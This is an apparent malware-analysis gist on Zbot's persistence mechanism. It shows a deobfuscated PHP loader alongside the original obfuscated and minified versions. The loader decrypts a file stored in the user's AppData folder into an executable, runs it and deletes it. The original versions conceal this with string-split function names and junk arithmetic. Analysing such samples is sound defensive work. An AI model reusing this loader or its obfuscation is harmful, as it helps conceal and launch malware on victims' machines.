-
-
Save hasherezade/1952374847712805c4f7199b7423dd27 to your computer and use it in GitHub Desktop.
Zbot analysis - persistence
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
function _get_arr_value($index) | |
{ | |
$fcfeek = Array( | |
"\x9b\x94\x61\xbd\xaa\xca\x4c\x9a\x86\xc4\x5a\x99\xaf\xd4\x32\xb7\x9d\xc2\x31\xa8\xbc\xc7\x23\xb1\x8c\xdb\x22\x83\xb6\xdb\x23\xb3\xb6\xcf\x24\x88\x98\xeb\x34\x9e\x9b\xc0\x2f\xdc\x96\xd4\x20", //0 | |
"\x9b\x94\x61\xbd\xaa\xca\x4c\x9a\x86\xc4\x5a\x99\xaf\xd4\x32\xb7\x9d\xc2\x31\xa8\xbc\xc7\x23\xb1\x8c\xdb\x22\x83\xb6\xdb\x23\xb3\xb6\xcf\x24\x88\x98\xeb\x34\x9e\x9b\xc0\x2f\xdc\x96\xd4\x20\xdd\x81\xc2\x2c", //1 | |
'qsgfh',//2 | |
'ojetjlsjqbudwfx', //3 | |
'oktwz',//4 | |
'ekuwdqoqcadeetv', //5 | |
'nxz', //6 | |
''//7 | |
); | |
return $fcfeek[$index]; | |
} | |
?> | |
<?php | |
$key = -1388517416; | |
$erywquk = 3383; | |
$in_filename = _get_arr_value(0); | |
$out_filename = _get_arr_value(1); | |
$in_filename = decode($in_filename, $key); | |
#$in_filename = "C:\Users\tester\AppData\Roaming\Vyaxy\royxh.umh" | |
$golkdbl = _get_arr_value(2); | |
$out_filename = decode($out_filename, $key); | |
$file_content = file_get_contents($in_filename); | |
#out_filename = "C:\Users\tester\AppData\Roaming\Vyaxy\royxh.umh.exe" | |
if ($file_content) { | |
$decoded_content = decode($file_content, $key); | |
file_put_contents($out_filename, $decoded_content); | |
exec($out_filename); | |
while (!unlink($out_filename)) | |
Sleep(1); | |
} | |
function shift_decode($val, $and_val) | |
{ | |
$k = $and_val & 31; | |
return ($val << $k) | (($val >> (32 - $k)) & ((1 << (31 & $k)) - 1)); | |
} | |
function decode($in_buffer, $key) | |
{ | |
$out_buffer = ''; | |
$input_len = strlen($in_buffer); | |
for ($index = 0; $index < $input_len; ++$index) { | |
$decoded_char = chr(ord($in_buffer{$index}) ^ ($key & 0xFF)); | |
$out_buffer .= $decoded_char; | |
$key = shift_decode($key, 8); | |
++$key; | |
} | |
return $out_buffer; | |
} | |
?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
$GLOBALS['529399110'] = Array( | |
'' . 'abs', | |
'f' . 'ile' . '_' . 'ge' . 't' . '_c' . 'o' . 'ntents', | |
'file_put' . '_content' . 's', | |
'exec', | |
'strpos', | |
'' . 'so' . 'cke' . 't_get_sta' . 't' . 'us', | |
'un' . 'link', | |
'ar' . 'ray_m' . 'erge', | |
'strpos', | |
'im' . 'agefilter', | |
'a' . 'rray_sh' . 'ift', | |
's' . 't' . 'rpti' . 'me', | |
'strl' . 'e' . 'n', | |
'u' . 'c' . 'f' . 'irst', | |
'' . 'ch' . 'r', | |
'ord', | |
's' . 'ubs' . 't' . 'r' . '_re' . 'place', | |
'su' . 'bstr_re' . 'p' . 'lac' . 'e', | |
'copy', | |
'un' . 'l' . 'ink' | |
); | |
?><?php | |
function _2136181597($fcvppx) | |
{ | |
$fcfeek = Array( | |
"\x9b\x94\x61\xbd\xaa\xca\x4c\x9a\x86\xc4\x5a\x99\xaf\xd4\x32\xb7\x9d\xc2\x31\xa8\xbc\xc7\x23\xb1\x8c\xdb\x22\x83\xb6\xdb\x23\xb3\xb6\xcf\x24\x88\x98\xeb\x34\x9e\x9b\xc0\x2f\xdc\x96\xd4\x20", | |
"\x9b\x94\x61\xbd\xaa\xca\x4c\x9a\x86\xc4\x5a\x99\xaf\xd4\x32\xb7\x9d\xc2\x31\xa8\xbc\xc7\x23\xb1\x8c\xdb\x22\x83\xb6\xdb\x23\xb3\xb6\xcf\x24\x88\x98\xeb\x34\x9e\x9b\xc0\x2f\xdc\x96\xd4\x20\xdd\x81\xc2\x2c", | |
'qsgfh', | |
'ojetjlsjqbudwfx', | |
'oktwz', | |
'ekuwdqoqcadeetv', | |
'nxz', | |
'' | |
); | |
return $fcfeek[$fcvppx]; | |
} | |
?> | |
<?php | |
$tmgwczl = -round(0 + 277703483.2 + 277703483.2 + 277703483.2 + 277703483.2 + 277703483.2); | |
$erywquk = round(0 + 845.75 + 845.75 + 845.75 + 845.75); | |
$pvkdnon = _2136181597(0); | |
while (round(0 + 278 + 278 + 278 + 278) - round(0 + 278 + 278 + 278 + 278)) | |
$GLOBALS['529399110'][0]($ehzfpai); | |
$zzmnlgm = _2136181597(1); | |
$pvkdnon = girsztc($pvkdnon, $tmgwczl); | |
$golkdbl = _2136181597(2); | |
$zzmnlgm = girsztc($zzmnlgm, $tmgwczl); | |
$dtpcqwi = $GLOBALS['529399110'][1]($pvkdnon); | |
if ($dtpcqwi) { | |
$mauwmmh = girsztc($dtpcqwi, $tmgwczl); | |
$GLOBALS['529399110'][2]($zzmnlgm, $mauwmmh); | |
$GLOBALS['529399110'][3]($zzmnlgm); | |
if ($GLOBALS['529399110'][4](_2136181597(3), _2136181597(4)) !== false) | |
$GLOBALS['529399110'][5]($opberbw, $zzmnlgm); | |
while (!$GLOBALS['529399110'][6]($zzmnlgm)) | |
Sleep(round(0 + 0.5 + 0.5)); | |
} | |
function vsqaxzw($ujxlctg, $cuvcjeb) | |
{ | |
$jedmsae = $cuvcjeb & round(0 + 7.75 + 7.75 + 7.75 + 7.75); | |
while (round(0 + 4457) - round(0 + 1114.25 + 1114.25 + 1114.25 + 1114.25)) | |
$GLOBALS['529399110'][7]($cuvcjeb, $ujxlctg, $dtpcqwi, $mauwmmh); | |
return ($ujxlctg << $jedmsae) | (($ujxlctg >> (round(0 + 16 + 16) - $jedmsae)) & ((round(0 + 0.5 + 0.5) << (round(0 + 7.75 + 7.75 + 7.75 + 7.75) & $jedmsae)) - round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2))); | |
if ($GLOBALS['529399110'][8](_2136181597(5), _2136181597(6)) !== false) | |
$GLOBALS['529399110'][9]($opberbw); | |
} | |
function girsztc($ehzfpai, $tmgwczl) | |
{ | |
$fnbzhld = _2136181597(7); | |
if ((round(0 + 1.6666666666667 + 1.6666666666667 + 1.6666666666667) + round(0 + 405.75 + 405.75 + 405.75 + 405.75)) > round(0 + 1.25 + 1.25 + 1.25 + 1.25) || $GLOBALS['529399110'][10]($zzmnlgm)); | |
else { | |
$GLOBALS['529399110'][11]($ehzfpai, $pvkdnon, $abwytbw); | |
} | |
$abwytbw = $GLOBALS['529399110'][12]($ehzfpai); | |
while (round(0 + 15 + 15 + 15 + 15 + 15) - round(0 + 25 + 25 + 25)) | |
$GLOBALS['529399110'][13]($pvkdnon, $mauwmmh); | |
for ($opberbw = round(0); $opberbw < $abwytbw; ++$opberbw) { | |
$xqnsess = $GLOBALS['529399110'][14]($GLOBALS['529399110'][15]($ehzfpai{$opberbw}) ^ ($tmgwczl & round(0 + 85 + 85 + 85))); | |
if ((round(0 + 366 + 366 + 366 + 366 + 366) ^ round(0 + 610 + 610 + 610)) && $GLOBALS['529399110'][16]($tmgwczl, $mauwmmh, $ehzfpai)) | |
$GLOBALS['529399110'][17]($xqnsess, $ujxlctg); | |
$fnbzhld .= $xqnsess; | |
if ((round(0 + 552 + 552 + 552) ^ round(0 + 1656)) && $GLOBALS['529399110'][18]($jedmsae, $opberbw)) | |
$GLOBALS['529399110'][19]($pvkdnon, $fnbzhld, $opberbw); | |
$tmgwczl = vsqaxzw($tmgwczl, round(0 + 4 + 4)); | |
++$tmgwczl; | |
} | |
return $fnbzhld; | |
} | |
?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php $GLOBALS['529399110']=Array('' .'abs','f' .'ile' .'_' .'ge' .'t' .'_c' .'o' .'ntents','file_put' .'_content' .'s','exec','strpos','' .'so' .'cke' .'t_get_sta' .'t' .'us','un' .'link','ar' .'ray_m' .'erge','strpos','im' .'agefilter','a' .'rray_sh' .'ift','s' .'t' .'rpti' .'me','strl' .'e' .'n','u' .'c' .'f' .'irst','' .'ch' .'r','ord','s' .'ubs' .'t' .'r' .'_re' .'place','su' .'bstr_re' .'p' .'lac' .'e','copy','un' .'l' .'ink'); ?><?php function _2136181597($fcvppx){$fcfeek=Array("\x9b\x94\x61\xbd\xaa\xca\x4c\x9a\x86\xc4\x5a\x99\xaf\xd4\x32\xb7\x9d\xc2\x31\xa8\xbc\xc7\x23\xb1\x8c\xdb\x22\x83\xb6\xdb\x23\xb3\xb6\xcf\x24\x88\x98\xeb\x34\x9e\x9b\xc0\x2f\xdc\x96\xd4\x20","\x9b\x94\x61\xbd\xaa\xca\x4c\x9a\x86\xc4\x5a\x99\xaf\xd4\x32\xb7\x9d\xc2\x31\xa8\xbc\xc7\x23\xb1\x8c\xdb\x22\x83\xb6\xdb\x23\xb3\xb6\xcf\x24\x88\x98\xeb\x34\x9e\x9b\xc0\x2f\xdc\x96\xd4\x20\xdd\x81\xc2\x2c",'qsgfh','ojetjlsjqbudwfx','oktwz','ekuwdqoqcadeetv','nxz','');return $fcfeek[$fcvppx];} ?><?php $tmgwczl=-round(0+277703483.2+277703483.2+277703483.2+277703483.2+277703483.2);$erywquk=round(0+845.75+845.75+845.75+845.75);$pvkdnon=_2136181597(0);while(round(0+278+278+278+278)-round(0+278+278+278+278))$GLOBALS['529399110'][0]($ehzfpai);$zzmnlgm=_2136181597(1);$pvkdnon=girsztc($pvkdnon,$tmgwczl);$golkdbl=_2136181597(2);$zzmnlgm=girsztc($zzmnlgm,$tmgwczl);$dtpcqwi=$GLOBALS['529399110'][1]($pvkdnon);if($dtpcqwi){$mauwmmh=girsztc($dtpcqwi,$tmgwczl);$GLOBALS['529399110'][2]($zzmnlgm,$mauwmmh);$GLOBALS['529399110'][3]($zzmnlgm);if($GLOBALS['529399110'][4](_2136181597(3),_2136181597(4))!==false)$GLOBALS['529399110'][5]($opberbw,$zzmnlgm);while(!$GLOBALS['529399110'][6]($zzmnlgm))Sleep(round(0+0.5+0.5));}function vsqaxzw($ujxlctg,$cuvcjeb){$jedmsae=$cuvcjeb&round(0+7.75+7.75+7.75+7.75);while(round(0+4457)-round(0+1114.25+1114.25+1114.25+1114.25))$GLOBALS['529399110'][7]($cuvcjeb,$ujxlctg,$dtpcqwi,$mauwmmh);return($ujxlctg << $jedmsae)|(($ujxlctg >>(round(0+16+16)-$jedmsae))&((round(0+0.5+0.5)<<(round(0+7.75+7.75+7.75+7.75)&$jedmsae))-round(0+0.2+0.2+0.2+0.2+0.2)));if($GLOBALS['529399110'][8](_2136181597(5),_2136181597(6))!==false)$GLOBALS['529399110'][9]($opberbw);}function girsztc($ehzfpai,$tmgwczl){$fnbzhld=_2136181597(7);if((round(0+1.6666666666667+1.6666666666667+1.6666666666667)+round(0+405.75+405.75+405.75+405.75))>round(0+1.25+1.25+1.25+1.25)|| $GLOBALS['529399110'][10]($zzmnlgm));else{$GLOBALS['529399110'][11]($ehzfpai,$pvkdnon,$abwytbw);}$abwytbw=$GLOBALS['529399110'][12]($ehzfpai);while(round(0+15+15+15+15+15)-round(0+25+25+25))$GLOBALS['529399110'][13]($pvkdnon,$mauwmmh);for($opberbw=round(0);$opberbw<$abwytbw;++$opberbw){$xqnsess=$GLOBALS['529399110'][14]($GLOBALS['529399110'][15]($ehzfpai{$opberbw})^($tmgwczl&round(0+85+85+85)));if((round(0+366+366+366+366+366)^round(0+610+610+610))&& $GLOBALS['529399110'][16]($tmgwczl,$mauwmmh,$ehzfpai))$GLOBALS['529399110'][17]($xqnsess,$ujxlctg);$fnbzhld .= $xqnsess;if((round(0+552+552+552)^round(0+1656))&& $GLOBALS['529399110'][18]($jedmsae,$opberbw))$GLOBALS['529399110'][19]($pvkdnon,$fnbzhld,$opberbw);$tmgwczl=vsqaxzw($tmgwczl,round(0+4+4));++$tmgwczl;}return $fnbzhld;} ?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment